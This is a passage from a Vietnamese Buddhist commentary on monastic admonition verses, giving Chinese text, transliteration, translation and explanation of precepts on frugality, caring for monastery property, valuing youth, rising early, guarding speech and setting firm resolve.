“Chớ hiềm áo mỏng đơn sơ”: nên mặc y phục đơn sơ một chút, dù vãi thô nhưng tề chỉnh sạch sẽ là tốt. Thời Hán, có một vị học giả làm quan đến chức tam công (một chức quan cao ở cấp trung ương). Ông ta vô cùng tiết kiệm, mọi người đều dùng lụa dùng gấm, còn ông thì dùng bông lót giường, đắp mền vải thô. Vì thế mà có điển tích “Tam công bố bị”. Chúng ta có thể học theo chuẩn mực nghìn đời ấy, đó gọi là đạm bạc, không nên tìm cầu nếp sống hưởng thụ.
Nếu không làm như thế, không chịu chấp nhận đạm bạc mà hướng tâm tìm cầu vật dụng tốt đẹp lại không biết cân nhắc sự thu nhập của mình, thích bòn rút trí tuệ và công sức của người khác. Như gần đây, nhật báo tranh nhau đưa tin sự thất bại của nhà họ Thái đã ảnh hưởng đến quốc gia, xã hội, khiến cho đời sống của hơn mười vạn dân bị uy hiếp. Dạng người như thế không chỉ thân bại danh liệt mà còn gánh chịu nhân quả rất lớn và trách nhiệm trước pháp luật. Điểm xuất phát của họ chính là không biết tri túc, lòng tham không biết chán đã làm hại họ. Họ tiếc không đem được toàn bộ tài vật của quốc gia xã hội về cho riêng mình. Kết quả vợ con rửa mặt bằng nước mắt, trong xã hội họ không thể ngẩng đầu lên được. Tạo nên sự kiện bất hạnh này không gì khác là do không biết tri túc, từ một niệm sai lạc mà dẫn đến. Vì thế, mơ tưởng đến tài vật của người khác, bòn rút trí tuệ và sức lực của người đều là những quan niệm sai lầm.
Nghĩ đến tài vật của người không bằng trở lại quán xét chính mình: ‘Vận mệnh của ta có hưởng được phúc báo hay không?’. Sao không nghe theo lời thánh Khổng: “Quân tử xét phận vị của mình mà làm”. Nếu quí vị vốn là người bần tiện mà lại mộng tưởng một nếp sống giàu có cao sang thế thì phải tự chuốc lấy phiền não. Hoặc cho dù quí vị có thể tận dụng hết trí tiểu thông minh của mình để lấy tiền của người khác, nhưng nợ nhân quả đó khó tránh, báo ứng không chỉ là câu nói ngoài cửa miệng, cũng hoàn toàn chẳng phải mê tín. Đó gọi là: “Không phải là không có báo ứng mà là thời cơ chưa đến”. Lí trời soi tỏ, thiện ác từ tâm, rốt cùng phải nhận lấy quả báo.
Vì thế chúng ta nhớ lại lời cảnh tỉnh của Tổ sư, và nhìn lại xã hội, thế giới này, lại nghĩ kỹ người xuất gia chúng ta phải thể hiện nếp sống của mình như thế nào? Đó gọi là: “Tri túc thường lạc”. Mong rằng chúng ta thực hiện được tiêu chuẩn này.
- Hạnh giữ gìn vật của thường trụ
Chữ Hán:
出家要顧常住,
一針一草勿棄。
隨心恣意侵損
伽藍與你算計
Phiên âm
Xuất gia yếu cố thường trụ
Nhất châm nhất thảo vật khí
Tùy tâm tứ ý xâm tổn
Già lam dữ nĩ toán kế.
Dịch nghĩa
Xuất gia giữ vật thường trụ
Cây kim ngọn cỏ chớ bỏ
Buông tâm phóng ý xâm tổn
Già-lam tính toán với bạn.
Giảng giải
Hạnh thứ hai mươi mốt của người xuất gia là phải biết mến tiếc vật thường trụ. ‘Thường trụ’ chính là nơi mà đại chúng xuất gia tu hành, còn gọi là ‘đạo tràng’, ý là mong muốn đại chúng tu hành đúng pháp khiến cho Phật pháp trụ mãi ở thế gian.
Thường trụ là đạo tràng chúng ta nương nhờ để tu hành, cũng là chỗ mà chúng ta nương vào để sống. Tất cả các vật dụng đều là của thường trụ cấp cho chúng ta, vì thế ta phải thương tiếc, không để lãng phí, tổn hại.
Trong kho đại Tòng lâm của chúng ta có một bức liễn ghi: “Ái tích thường trụ vật, như hộ nhãn trung chu”, nghĩa là yêu cầu đại chúng mến tiếc vật thường trụ giống như bảo hộ tròng mắt của mình. Tròng mắt của mình nếu lỡ bị một hạt bụi bay vào thì không thể nhìn được. Vì thể dùng nó để nói lên sự trọng yếu việc mến tiếc vật của thường trụ rất là thích đáng, chẳng phải quá mức.
Chúng ta là người tu hành, đời sống phải đạm bạc, không cầu hưởng thụ. Vì tất cả vật của thường trụ đều do tín thí cúng dường, bố thí. Thí chủ cúng dường cho ta vật dụng trong sinh hoạt hằng ngày, hi vọng chúng ta không bận tâm về phương diện vật chất mà có thể chuyên tâm học đạo, tu đạo. Đạo nghiệp chúng ta thành tựu, cũng là công đức thí chủ thành tựu. Giả sử chúng ta không biết trân quí vật của thường trụ, vậy là đã cô phụ lòng tốt của tín chủ. Do đó Tổ sư dạy chúng ta phải mến tiếc vật thường trụ.
Thông thường mọi người đều có tâm lí riêng tư, quí tiếc của mình, làm tổn của công. Cho rằng vật chung có thể tùy ý sử dụng, dùng nhiều một chút, thậm chí bị hư hao cũng không có vấn đề. Quê tôi có câu tục ngữ: “Bảo đích nhi tử đương binh đả tử thị biệt nhân gia đích nhân[29]”. Mình không có con, nuôi con của người khác, rồi cho đi đầu binh, mà cha mẹ cũng không quan tâm, vì đứa con ấy không phải do họ sinh ra. Thông thường người sử dụng những vật của thường trụ cũng đều có tâm lí như thế. Nếu như mọi thứ đều từ ví tiền mình đưa ra thì đã đau đớn mến tiếc. Kì thật không nên có nhận thức như thế, đồ vật dùng chung đã được sử dụng thoải mái mà không cần phải trả tiền, lẽ ra nên biết trân quí, không nên lãng phí, đó là tiếc phúc. Đứng trên lập trường tu phúc mà nói thì cũng nên mếm tiếc vật của thường trụ. Đồng thời vật của thường trụ là phương tiện giúp cho nhiều người học đạo, vì thế bảo quản vật của thường trụ có ý nghĩa vô cùng sâu xa. Chúng ta không nên bỏ qua vấn đề này.
Một lá rau, một cọng cỏ đều không được tùy tiện vất bỏ. Đó là hình dung vật nhỏ nhất rẻ nhất cũng nên mến tiếc. Ngày xưa công nghiệp không phát triển, khi đun nước, thổi cơm đều dùng củi, nếu thiếu một cọng cỏ thì nước không sôi, cơm không chín, cho nên Tổ sư dạy như thế. Thậm chí một cây kim, một cọng cỏ cũng phải trân quí.
“Buông tâm phóng ý xâm tổn”: Nếu người không có đức mến tiếc của công thì tùy tiện phá hoại, hoặc chiếm làm của riêng, như thế tội rất lớn. Tôi nhớ lại, thời kì đầu dự học ở Phật học viện, lúc dọn vệ sinh, có người vô ý làm vỡ một chậu hoa; tuy là lỡ tay làm vỡ nhưng chiếu theo qui định của thường trụ phải bồi thường. Tuy lúc ấy chúng tôi không có tiền nhiều mang theo nhưng vì xem trọng nhân quả nên chấp nhận để mình chịu khổ một chút.
Chúng sinh thường có bệnh tham, thấy vật gì vừa ý thì liền chiếm làm của riêng, đó là do không rõ nhân quả. Phải biết rằng vật của thường trụ không được chiếm dụng, bởi “Già lam sẽ tính với bạn”. Đó là nói trong tự viện đều có thờ các thánh chúng, thần hộ pháp như Hộ Pháp Vi-đà và Già-lam để hộ vệ người và pháp. Ngày xưa các tự viện lớn thờ hộ pháp Vi-đà ở mặt sau, giữa điện thiên vương, cùng đối lưng với tượng Phật Di-lặc. Phía trước thờ Phật Di-lặc mặt hướng ra bên ngoài, biểu thị sự hoan hỉ chào đón tín đồ đến lễ Phật tu phúc; mặt sau thờ bồ-tát Vi-đà với ý nghĩa giám sát người ra vào, không cho đánh cắp vật thường trụ. Nếu có, thì ngài liền đến ngăn cản. Sau đây sẽ giới thiệu khái quát về Vi-đà và bồ-tát Già-lam.
Bồ-tát Vi-đà Tôn thiên là một trong tám vị tướng ở cõi trời phía Nam, cũng chính là chủ soái thống lãnh ba mươi hai vị tướng ở cõi Tứ thiên vương, Lúc ở hội Linh Sơn, Bồ-tát đã nhận sự giao phó của Phật-đà, gánh vác trách nhiệm ngoại hộ Phật pháp, thống lãnh các vị thần hộ pháp trong ba châu Đông, Nam, Tây, cùng hộ vệ Tăng-già, lấy cứu độ tất cả chúng sinh làm hạnh nguyện. Vì thế từ xưa đến nay, hễ kiến lập tự viện nhất định thờ cúng bồ-tát Vi-đà, vì sùng kính công đức hộ trì chính pháp của ngài.
Bồ-tát Già lam Thánh chúng tức là các thần hộ vệ Tăng già-lam. Kinh Thất Phật ghi: “Có mười tám thần hộ vệ Già-lam, tên của các ngài là: Mỹ Âm, Phạm Âm, Thiên Cổ, Thánh Diệu, Thán Mỹ, Ma Diệu, Lôi Âm, Sư Tử, Diệu Thán, Phạm Hưởng, Nhân Âm, Phật Nô, Tụng Đức, Quảng Mục, Diệu Nhãn, Triệt Thính, Triệt Thị, Biến Thị”. Bản nguyện của những vị thần ấy giống như thệ nguyện của bồ-tát Vi-đà. Vì thế trong chùa mỗi lần phụng cúng Vi-đà Tôn thiên cũng đồng thời cúng những vị này. Kinh Sa-di đắc độ ghi: “Già lam, Thổ địa có uy đức và hào quang, hộ pháp hộ người, khiến cho không có việc khó khăn xảy ra”. Do đó có thể thấy sự oai linh hiển hách của những vị thần này là để hộ vệ đạo tràng, để tăng chúng xuất gia có thể an tâm tu đạo.
Ngày nay các tự viện trong nước chúng ta đều có thờ Quan Vũ đế, một tướng thời Hán làm thần hộ pháp Già lam. Sở dĩ như thế là do Quan Vân Trường một đời trung nghĩa, thông minh chân chính. Sau khi hi sinh ông từng hiển linh ở trên núi Ngọc Tuyền, đầu tiên là để cầu Đại sư Trí Giả truyền giới, sau cầu hòa thượng Thần Tú dạy ông tham thiền. Sau khi được Hòa thượng tế độ, ông lập nguyện Hộ Pháp. Đó là nguyên nhân ông làm thần hộ pháp Già-lam. Nêu lên Quan Vân Trường là đại biểu cho các thần hộ pháp Già-lam, chẳng phải cũng rất hợp lí sao?
22. Hạnh quí tuổi trẻ
Chữ Hán
出家要趁少年,
諸般要去向前。
當此膂力強健,
耕轉祖業田園
Phiên âm
Xuất gia yếu trân thiếu niên
Chư ban yếu khứ hướng tiền
Đương thử lữ lực cường kiện
Canh chuyển Tổ nghiệp điền viên.
Dịch nghĩa
Xuất gia phải quí tuổi trẻ
Các môn nỗ lực học hành
Nhân lúc sức lực sung mãn
Vun bồi nghiệp Tổ tươi xanh.
Thiếu niên là thời kì hoàng kim mà tạo hóa ban cho mỗi con người. Thời kì này tạo tiền đề cho sự thành tựu lớn lao sau này. Vì thế, người xuất gia phải biết trân quí thời thiếu niên mà nỗ lực tu học.
Thời kì thiếu niên là từ mười tuổi đến hai mươi tuổi, trước mười tuổi là đồng niên. Trong thời kì này, các em đều rất ngây thơ, hoàn toàn không biết con đường phía trước như thế nào. Sau mười tuổi dần dần nhận biết sự việc, và bắt đầu tính toán tương lai cho mình nên thời kì này là thời kì quí nhất của con người. Một con người có thể thành tựu hay không, cơ bản quyết định ở thời kì này có chịu nổ lực tu học hay không. Chính vì thế mà giáo dục trung học, đại học đều được tiến hành từ thời kì này. Nếu trong khoảng mười năm không nhận được sự giáo dục tốt, hoặc là tự mình không biết nổ lực, thì tuy từ tuổi hai mươi trở lên cố nhiên là còn có thể giáo dục, nhưng lúc ấy sức ghi nhớ đã không bằng thời gian trước, sự chuyên tâm cũng không bằng. Do đó chúng ta phải trân quí thời thiếu niên. Đây là thời kì tối ưu, làm nền tảng học nghiệp của một đời người. Người xuất gia có thể thành tựu đạo nghiệp hay không cũng tại có khéo sử dụng thời gian quí báu này hay không.
Ở tỉnh chúng ta không nhiều người xuất gia vào thời thiếu niên, vì thế trong quá trình tu học so ra hơi trì hoãn một chút, khó khăn hơn về phương diện tri thức văn tự, không như những học tăng trong chuyên khoa, ít ra sức tưởng tượng, sức chú ý, sức ghi nhớ, sức lý giải của họ đều nhanh nhạy hơn, bởi vì họ học từ nhỏ, trung học, rồi đến đại học, tiếp nhận giáo dục một cách trình tự không gián đoạn, và còn có những người đã vượt qua ngưỡng đại học, là nhân vật đạt đỉnh cao của sự học tập! Học viện Phật giáo chúng ta nhiều năm qua, việc tuyển sinh không chặt chẽ, nên chưa thành công trong việc đào tạo Tăng tài. Xét nguyên nhân chính là do tuyển chọn học sinh không đủ tố chất, tuy đa phần đều có học qua trung học, cao đẳng, nhưng đã có khoảng thời gian gián đoạn, khiến cho học nghiệp bị lãng quên vì thế khi học trở lại đều rất khó. Đó chỉ có thể nói là mọi người không đủ phúc báo. Để bù đắp cho khiếm khuyết này chỉ có thể hi vọng tăng sinh dẹp bỏ vọng tưởng, chú tâm tập định, tận tâm học tập thì mới có chút thành tựu.
Báo cáo hàng tuần của giám thị cho thấy, tâm của quí vị còn nhiều loạn động, thị phi ngấm ngầm, cái này lên cái kia xuống, đó chẳng phải là hiện tượng tốt. Khổng Tử từng nói: “Không gánh vác chức vị ấy thì không mưu toan phần việc của chức vị ấy[30]”, tất cả mọi việc trước phải kiểm điểm chính mình, hành vi của người khác có thể làm tấm gương phản chiếu cho chúng ta, trăm nghìn lần đừng vì những việc không đâu ấy mà sinh khởi phiền não. Chúng ta đã từng học qua Duy thức, biết được khởi nguyên của phiền não, và cũng nắm rõ phương pháp đoạn trừ phiền não như thế nào. Nói đến đoạn trừ phiền não, đó là một trong những công việc cày bừa đất tâm vô cùng quan trọng trong Phật pháp. Giống như nhà nông diệt cỏ, trước phải cày xới đất, rồi nhổ sạch gốc cỏ mới có thể khiến cho ruộng hoang trở thành ruộng tốt.
Hi vọng các vị vì để bù đắp cho sự lãng phí của thời niên thiếu mà tuần tự tu học, sửa đổi những sự khiếm khuyết, biết mến tiếc hiện tại, trừ bỏ muôn duyên, chuyên tâm tu học! Thời gian trôi qua rất nhanh, một tuần, một tháng, một học kì qua đi. Một đời chúng ta có bao nhiêu tuần, bao nhiêu tháng, có bao nhiêu học kì, có bao nhiêu năm học?!
“Còn trẻ không nổ lực, đến già ngồi sầu bi”. Đó là câu nói mà mọi người đều biết, nhưng không biết để nhắc nhở bản thân mình thì cũng trở thành vô ích. Vì thế Tổ sư đặc biệt cảnh tỉnh chúng ta phải trân quí tuổi trẻ, chuyên tâm tu hành.
“Các môn nỗ lực học hành”: thiếu niên là thời kì hấp thụ tri thức một cách triệt để, vì thế nói ‘các môn’; không kể là thế gian pháp hay xuất thế gian pháp, đều phải nỗ lực học tập để cầu tiến bộ, không nên dừng lại khi có chút thành tựu, cần phải tiến tới tiến tới, càng tiến tới mới có thể hoàn thành đại nghiệp học Phật.
“Nhân lúc sức lực sung mãn”: Sức lực chính là thể lực của chúng ta, thời kì thiếu niên, thể lực phát triển, giống như cành cây mới nhú mầm, tràn đầy sức sống. Lợi dụng thời kì quí báu này, mỗi người phải chăm bón làm sao để cuộc đời mình nở hoa một cách rực rỡ, mới không uổng một kiếp sống này. Cuộc đời của mỗi con người, đều có thời kì nở hoa, nhưng hoa có nở hay không cần phải xem chúng ta có nổ lực hay không. Vì thế câu kế tiếp vô cùng trọng yếu.
“Vun bồi nghiệp Tổ tươi xanh”: Đức giáo chủ Thích-ca Mâu-ni Phật đã để lại cho chúng ta một mảnh ruộng trồng cây tuệ giác. Trải qua bao đời, các vị Tổ sư nổ lực canh tác, khiến cho cây Phật pháp nơi mảnh đất ấy càng thêm xanh tươi, mầm mộng đua nhau phát triển, sự sống mơn mởn, nhưng đáng tiếc hiện nay mảnh đất ấy, dần dần trở thành hoang vu. Trách nhiệm phục hưng nghiệp Tổ đã thuộc về chúng ta, mong rằng mỗi một thanh niên Phật giáo cùng nhau nổ lực canh tác.
Thời kì đầu truyền đến Trung Quốc, Phật pháp phát triển rất nhanh, phân thành đến mười ba tông phái. Các vị Tổ sư căn cứ một bộ kinh, một bộ luận, đem yếu nghĩa của kinh luận đó phát huy nhằm biểu thị tư tưởng trọng tâm của bộ kinh, luận. Hi vọng mọi người nương theo tư tưởng ấy để học, để tu, để chứng. Trên nguyên tắc đồng khí tương cầu, nên những học giả yêu thích những bộ kinh luận nào thì nhóm họp lại, từ đó hình thành một một tông phái.
Lúc bấy giờ, có các tông như Thành Thật tông, Câu-xá tông, Địa luận tông, Luật tông…Thiền tông phát triển chậm hơn một chút, Thiên thai tông hình thành sớm hơn, còn Hoa Nghiêm tông phát triển rất nhanh trong thời kì Phật giáo Trung Quốc đã thành thục, vì thế sự phán giáo của Hoa Nghiêm tông là một sự phán giáo rất hoàn thiện. Ngoài ra còn có tịnh độ tông do đại sư Tuệ Viễn khai mở, Tam Luận tông do Gia Tường đại sư hình thành, Luật tông do luật sư Đạo Tuyên, Chân Ngôn Tông do Bất Không tam tạng, thật là trăm hoa đua nở. Cội nguồn Phật giáo như thế, chúng ta có thể thấy là vô cùng thịnh vượng. Sự hưng thịnh ấy, nhất định phải kết quả chắc thật.
Đến cuối đời Đường, sau khi Vũ Tông diệt Phật pháp, chỉ còn lại thiền Tông là có khả năng kéo dài, những tông phái khác đều tàn lụi. Vì thế, Tổ sư muốn chúng ta phải trân quí thể lực cường tráng lúc trẻ, canh tác mảnh đất và sự nghiệp của Tổ. Mỗi ngày chúng ta đều niệm: “Phật nhật tăng huy, pháp luân thường chuyển” không phải niệm một cách lấy lệ mà phải hướng đến mục tiêu này một cách tích cực! Thân làm người xuất gia, ruộng vườn Phật giáo to lớn này chính là gia nghiệp của chúng ta. Nếu để ruộng vườn hoang vu, cỏ dại thì chúng ta thật xấu hổ; ngược lại, khiến cho ruộng vườn Phật pháp xanh tốt thì đó là sự vinh quang của chúng ta, cũng chính là trách nhiệm mà chúng ta cần phải tận lực. Vì thế, chúng ta cần phải suy tư, nổ lực tiến thủ, luôn luôn nhắc nhở chính mình mới không cô phụ một phiến sơ tâm xuất gia, mới hoàn thành được trách nhiệm của mình. Mọi người hãy cùng nhau chung sức dựng xây ruộng vườn Tổ nghiệp!
- Hạnh dậy sớm
Chữ hán
出家要起得早
遲了修行不了
明朝又有明朝
明朝壽命難保。
Phiên âm
Xuất gia yếu khởi đắc tảo
Trì liễu tu hành bất liễu
Minh triêu hựu hữu minh triêu
Minh triêu thọ mạng nan bảo.
Dịch nghĩa
Xuất gia cần phải dậy sớm
Chậm trễ tu hành chẳng đạt
Một mai rồi lại một mai
Một mai mạng sống khó giữ.
Ngủ là một nhu cầu trọng yếu nhằm khôi phục tinh thần, nhưng việc ngủ nghỉ phải có qui định thời gian, tốt nhất là vừa đủ, không nên tham nhiều. Có lúc chúng ta chỉ ngủ một thời gian ngắn một hoặc hai tiếng đồng hồ thì có thể khôi phục tinh thần. Sợ nhất là khi nằm xuống mà tâm không định tỉnh, loạn tư tạp tưởng, nên ngủ không được. Ngủ không sâu khiến cho cơ thể không khôi phục tinh thần mà lại mệt mỏi, buồn ngủ. Chúng ta cần tìm ra nguyên nhân, tập thành thói quen nằm xuống là vào giấc ngủ. Được như thế thì cho dù khổ nhọc thế nào chỉ cần ngủ một vài tiếng đồng hồ là có thể khôi phục thể lực và tinh thần.
Một đời người tám mươi năm, nếu tính không lầm thì gần một nửa thời gian dành cho ngủ nghỉ. Vì thế tuy sống đến tám mươi tuổi, nhưng thật tế thì chỉ có bốn mươi năm mà thôi. Ở trong bốn mươi năm đó, lại trừ ra thời gian thơ ấu và bệnh tật, thù tạc vãng lai…, thời gian còn lại để chúng ta chân thật dụng tâm tu học nào có được bao nhiêu? Giá như không biết trân quí, còn muốn ngủ nghỉ biếng nhác thì quá lãng phí. Hãy nghe hoàng đế Đại Ngu đời Hạ nói: “Trân quí tấc bóng thời gian”.
Ngày xưa không có đồng hồ, người ta chỉ nhìn bóng mặt trời chuyển động từng tấc, họ tính thời gian bằng tấc bóng, đến Đào Khản đời Tấn mới có tiến bộ hơn, ông chủ trương: “Trân quí khoảnh khắc thời gian”. Với chủ trương trân quí thời gian như thế nên họ đều trở thành những nhân vật rất thành công trong lịch sử.
Sinh mạng đối với chúng ta mà nói cố nhiên là rất quí, kéo dài sinh mệnh chính là thời gian, giống như cá với nước. Vì thế, sau thời tụng kinh chiều chúng ta thường niệm kệ sách tấn của bồ-tát Phổ Hiền, trong đó có câu: “Như cá cạn nước[31]”. Câu này biểu thị thời gian qua đi từng ngày, giống như nước để nuôi cá, mỗi ngày một cạn, khi nước trong ao khô cạn thì cá cũng không thể sống được. Con người nếu không có thời gian thì mạng sống kết thúc, do đó chúng ta phải hiểu mà trân quí thời gian, và như thế chính là trân quí sinh mạng quí báu.
Trong sinh hoạt Tùng lâm, thông thường vào khoảng 10 giờ thì đi ngủ, 3 giờ 30 sáng thức dậy, 4 giờ lên chính điện. Nếu trong thời gian tịnh tu nhập thất thì chỉ ngủ khoảng hơn ba tiếng, dồn tất cả thời gian vào việc dụng công tu hành. Tinh thần của hành giả được tôi luyện như thế. Nếu người giải đãi thì làm sao tu hành? Chúng ta có được cơ hội tốt như thế có thể nói là nghìn năm khó gặp. Thử nghĩ, chúng ta sinh tử luân hồi trong sáu đường, nếu trong quá khứ không kết duyên thù thắng với Phật pháp, thì đời nay đâu có cơ hội nghe pháp, được xuất gia tu hành? Và cũng do trong quá khứ chúng ta không chân thật tu hành nên mới vào dòng sinh tử luân hồi. Chúng ta cũng có thể nói: Chúng ta là thừa nguyện tái sinh nhưng những thành tựu và biểu hiện của chúng ta có phải là Bồ-tát thừa nguyện tái sinh hay không?
Tóm lại, nhờ kiếp quá khứ ở trong Phật pháp có trồng chút căn lành vì thế nay mới có duyên gặp Phật pháp, lại còn có thể xuất gia, nhưng mà công phu tu hành ở trong quá khứ chưa đủ, cho nên sinh tử chưa dứt. Đời này nếu không xong, hẳn khi ca-sa rời thân thì đau đớn vô cùng. Vì thế, mọi người phải luôn luôn cảnh tỉnh mình: “Tu hành nếu không thành tựu thì đó là sự sỉ nhục và tổn thất lớn cho chúng ta”
“Một mai rồi lại một mai”: cứ bằng lòng với ý niệm ngày nay tu không thành công thì còn có ngày mai – một thói quen vô trách nhiệm, không lấy gì bảo đảm. Đời người có bao nhiêu ngày mai? Nếu đời này không tu tốt, lại ký gửi hi vọng ở đời sau, thì vô cùng nguy hiểm, không đáng tin cậy! Vì việc lớn chưa sáng, một niệm muội mê. Đó gọi là: “Ba tâm chưa rõ thì dù nhận tín thí một giọt nước cũng khó tiêu[32]”. Thế là đời sau phải mang lông đội sừng để trả nợ xưa. Đâu thể như thế mà an ổn với tứ sự cúng dường một cách đầy đủ? Không nên vọng tưởng đến ngày mai, ngày mai không đáng tin cậy, lấy hiện tại là thật tại trọng yếu nhất.
“Ngày mai thọ mạng khó giữ”: Mạng sống của con người vô thường chỉ trong một hơi thở. Con người chẳng kể là già hay trẻ đều có thể chết bất cứ lúc nào, một hơi thở ra không trở lại thì mạng sống kết thúc, mạng sống của ngày mai quả thật rất khó giữ! Ở đây ngày mai cũng chỉ cho kiếp sau. Câu này đối với người tu hành chúng ta mà nói là một lời cảnh sách trọng yếu. Hi vọng mọi người đều ghi nhớ câu này, không nên xem thường mà thực hành một cách tích cực trong sinh hoạt hằng ngày. Kỳ thật, học Phật nghe pháp chẳng ở chỗ tham nhiều mà là có thể thực hành được một chút những điều mình nghe. Khi luận về chính trị, Khổng Tử cũng nói: “Làm chính trị, chẳng phải ở chỗ nhiều lời[33]” cũng chính là ý này. Chỉ cần y giáo phụng hành, không thì không thể chứng ngộ Phật đạo, liễu thoát sinh tử.
- Hạnh cẩn thận nói ít
Chữ hán
出家要口謹默,
不可多嘴饒舌。
若然惹是招非,
地獄少你不得
Phiên âm
Xuất gia yếu khẩu cẩn mặc
Bất khả đa chủy nhiêu thiệt
Nhược nhiên nhạ thị chiêu phi
Địa ngục thiếu nĩ bất đắc.
Dịch nghĩa
Xuất gia cẩn trọng lời nói
Đừng nói những điều vô ích
Nếu không chuốc lấy lỗi lầm
Địa ngục không thể thiếu bạn.
Giảng giải
Trọng điểm của hạnh này là Tổ sư muốn dạy chúng ta cẩn trọng lời nói. Ngôn ngữ là nhịp cầu liên lạc giữa mọi người, nếu chúng ta quan sát lời nói phát ra từ một người có học vấn, tu dưỡng đạo đức thì khiến cho ta chăm nghe họ nói; còn nếu nói mà nội dung trống rỗng, ngôn ngữ lại thô bỉ thì khiến người nghe không lọt tai, đó là biểu thị kẻ không có tu dưỡng. Nếu là lời có lí, ngôn từ thanh nhã sẽ gây cho người khác một ấn tượng tin thuận rất sâu. Phật giáo chủ trưởng giảng giải phải tùy theo căn cơ, điều này Khổng Từ cũng nói: “Đối với người đáng nói mà không nói thì mất người; với hạng người không đáng nói mà nói thì phí lời[34]”. Vì thế, lúc Đức Phật thuyết pháp, nếu thấy đối tượng căn cơ chưa thuầnn thục thì Ngài không nói, để họ khỏi mắc tội phỉ báng. Đó chính là yếu nghĩa mà Tổ sư muốn chúng ta hiểu rõ.
Thông thường, chúng ta làm người ai cũng tự mình tu dưỡng, muốn lời nói cẩn trọng chân thật. Khổng Tử nói: “Người quân tử dung nghi không trang nghiêm thì không có uy đức, và sở học cũng không bền vững[35]”. Người học Phật chúng ta cũng như thế, nếu như tất cả những cử chỉ oai nghi, biểu hiện mà không trang nghiêm, không thường nương vào lời thầy dạy, lời thánh huấn thị mà tu trì thì chỗ tu chỗ học ấy chẳng thể bền vững, thiết thực.
“Đừng nói những điều vô ích”: Ưa nói, đó là thiên tính của con người, song cũng có người không thích nói, nhưng đó chỉ là thiểu số. Trong Tùng Lâm có câu cảnh sách: “Mở miệng mất nguyên khí, động lưỡi sinh thị phi”. Do đó, nói nhiều tuyệt đối hoàn toàn chẳng phải là việc tốt. Bao nhiêu thị phi ở thế gian đều xuất phát từ con người nhàn rỗi lắm chuyện. Vì để thể hiện chính mình, khiến mọi người cung kính cúng dường mà nói dối, nói gạt, khích bát li gián… Nghiệp nhân mà hạng người ấy tạo ra, ở trong kinh Hoa Nghiêm nói rất rõ: “Tội vọng ngữ cũng khiến cho chúng sinh đọa ba đường ác, nếu sinh trong loài người gặp phải hai dạng quả báo. Một là bị nhiều người phỉ báng, hai là bị người khác đặt điều”. Như có người câm ngọng nói không thành tiếng, răng, miệng không sạch đẹp, thậm chí có nói ra điều gì cũng không được mọi người xem trọng. Đó là do nhân đời trước nói chuyện thị phi của người khác. Người ấy sau khi thụ khổ báo trong ba đường ác rồi, sinh vào nhân gian phải chịu quả báo còn lại như thế. Ý thức về tội báo vọng ngữ, vì loại bỏ những mối quan hệ không xứng ý và để tránh những ác báo đời sau, chúng ta nên ghi nhớ lời Tổ sư dạy, cẩn trọng lời nói và hành động, chẳng nên phóng ý nói dối tạo nên nhân ác.
Tội vọng ngữ, ngoài những điều nói trên, còn có nói lưỡi đôi chiều, nói lời ác và nói lời mê hoặc, tất cả cũng đều cấu thành nhân bất thiện đọa vào ba đường ác. Người nói lưỡi đôi chiều là đến người này nói chuyện người kia, đến người kia nói chuyện người này, châm chích li gián, đặt điều thị phi, hành vi như thế rất dễ làm tổn thương tình cảm bạn bè, nhiễu loạn sự an hòa trong xã hội. Điều đó sẽ chiêu cảm hiện báo và hậu báo vô cùng nghiêm trọng. Kinh Hoa Nghiêm ghi: “Tội nói lưỡi đôi chiều cũng khiến cho chúng sinh đọa vào ba đường ác, nếu sinh vào loài người phải chịu hai thứ quả báo, một là quyến thuộc chia lìa, hai là thân tộc tệ ác”. Chúng ta lẽ nào không cẩn thận!
Còn ác khẩu là nói lời hung ác, buông lòng mạ lị người khác, người tâm sân nặng rất dễ phạm tội này, hiện báo, hậu báo chẳng nhẹ. Kinh Hoa Nghiêm nói: “Tội ác khẩu cũng khiến cho chúng sinh đọa vào ba đường ác, nếu sinh trong loài người gặp phải hai thứ quả báo, một là thường nghe lời ác, hai là gây nhiều việc đấu tranh kiện tụng”. Tâm sân la mắng người khác có quả báo như thế, không thể không cẩn trọng.
Còn như nói lời hoa mỹ để mê hoặc người khác, đó là một dạng hành vi của kẻ tiểu nhân bề ngoài giả dối, a dua siểm nịnh. Người mang tâm tham lam đê tiện dễ phạm những tội nghiệp như thế. Những tội lỗi này đủ để làm nguy hại nhân quần xã hội. Vì thế chịu quả báo rất nặng. Kinh Hoa Nghiêm nói: “Tội ỷ ngữ cũng khiến cho chúng sinh đọa ba đường ác, nếu sinh trong loài người phải chịu hai thứ quả báo: một là nói không ai nghe, hai là lời nói chẳng rõ ràng”.
Ở trên là bốn lỗi của miệng mà mọi người rất dễ phạm, khi phạm rồi chiêu lấy quả khổ, nhiều đời chịu lấy quả báo, không thể xem thường. Vì thế, Tổ sư đặc biệt răn nhắc. Đó gọi là “Địa ngục không thể thiếu bạn”, lời này rất thật!
- Hạnh lập chí nguyện
Chữ hán
出家要立主意,
務使頓明心地,
妄為顛倒攀緣,
阿鼻誰人可替?
Phiên âm
Xuất gia yếu lập chủ ý
Vụ sử đốn minh tâm địa
Vọng vi phiền não phan duyên
A-tì thùy nhân khả thế?
Dịch nghĩa
Xuất gia phải lập chí nguyện
Quyết đạt tâm địa khai minh
Buông theo nhân duyên phiền não
A-tì ai người thay thế!
Giảng giải:
Chúng ta từ vô thỉ đến nay nổi trôi trong sinh tử, đắm chìm trong lục đạo, khổ chẳng thể nói. Giả sử chúng ta có túc mạng thông, biết được những kiếp trước đã từng ở địa ngục thụ vô vàn hình khổ, muôn lần chết, muôn lần sống; hoặc làm ngạ quỉ đói khát, hình hài tiều tụy khô gầy; hoặc làm súc sinh chịu các sự khổ, mang vác nặng nhọc, kéo cày kéo xe cho người, sinh mạng mong manh, không biết bị giết lúc nào… lúc đó nhất định chúng ta đau xót rơi lệ, hổ thẹn vạn phần. Trôi nổi trong luân hồi phải chịu khổ não như thế, thì cần phải tìm cầu con đường giải thoát, mới có thể lìa khổ đắc lạc, liễu thoát sinh tử. Hiện nay chúng ta được làm thân người, đã nghe được Phật pháp lại hiện tướng Tăng thì cần phải trân quí nhân duyên khó được này, phải hạ quyết tâm, kiên định ý chí, quyết đoạn dứt việc lớn sinh tử; nếu y nhiên vẫn mê không ngộ, không cầu ra khỏi luân hồi thì thật hết thuốc chữa. Vì thế, Tổ sư cảnh tỉnh chúng ta, khi còn trẻ phải lập chí nguyện đại trượng phu hướng đạo tu hành.
“Quyết đạt tâm địa khai minh”: Mục đích chủ yếu của người xuất gia tu hành là khai minh tâm địa, chuyển phàm thành thánh, giải thoát sinh tử. Vì thế, đã phát tâm xuất gia cần phải đạt được mục đích ấy mới có ngày xa lìa biển khổ, chứng thành đại giác.
